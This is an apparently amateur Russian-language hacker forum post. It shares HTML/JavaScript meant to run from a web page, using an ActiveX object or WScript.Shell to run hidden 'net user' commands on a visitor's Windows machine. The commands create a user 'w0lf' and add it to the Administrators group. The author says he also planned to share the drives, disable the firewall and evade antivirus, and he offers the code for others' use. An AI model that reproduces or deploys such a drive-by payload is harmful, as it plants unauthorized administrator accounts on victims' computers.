| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
Почитал я как-то хаос е-зайн, статью про потоки в нтфс (файловая система в винде линейки нт +)). И подумал можно ли
написать скрипт который:
1. Создавал на компе пользователя.
2. Двигал нового пользователя в группу админов.
3. Открывал на доступ локальные диски (расшаривал диски =))
Предполагалось еще тушить файерволл (если он есть соответственно), думал над тем как обойти запущенный на компе жертвы
антивирус.. а потом меня взяла лень.. и я просто забил на все это.. То что успел написать выкладываю здесь.. может
кому-нить и пригодицца..
Итак, вот код:
<applet id="theActiveX"
code=com.ms.activeX.ActiveXComponent
height=0 width=0>
</applet>
<script>
function modify()
{try{theActiveX.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
theActiveX.createInstance();
Shl=theActiveX.GetObject();
}
catch(gfgf)
{
try
{
Shl=new ActiveXObject("WScript.Shell");
}
catch(fdsafd){};
}}
function work()
{try{Shl.run("net user w0lf password /add",0);
Shl.run("net localgroup Администраторы w0lf /add",0);
}catch(dsds){}}
setTimeout("modify()",100);
setTimeout("work()",100);
</script>
значит, чо мы тут делаем.. объявляем активх компонент Shl, предполагалось заюзать уязвимость во все том же активх.. дома,
у мя все пахало на ура (windows 2000 pro без сервис паков, ослик 6). Но на работе windows 2000 server (со всеми заплатами),
ослик 5.5 - отказалось работать (выдает запрос на запуск объекта.. что само по себе не прикольно).
Shl.run("net user w0lf password /add",0); создаем пользователя w0lf
0 для того чтобы не выводилось окно cmd во время наших манипуляций ;))
Shl.run("net localgroup Администраторы w0lf /add",0); двигаем созданного пользователя в группу админов..
По поводу других возможностей ничего говорить не буду.. а тому кому все-таки интересно то.. Пуск->Выполнить->cmd в
появившейся консоли: net /? и читаем.. Скажу лишь что можно еще писать в реестр, запускать и останавливать сервисы.. да и
много чего еще.. Только вот код мне лень отлаживать.. потому и выложил то что есть..
|
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |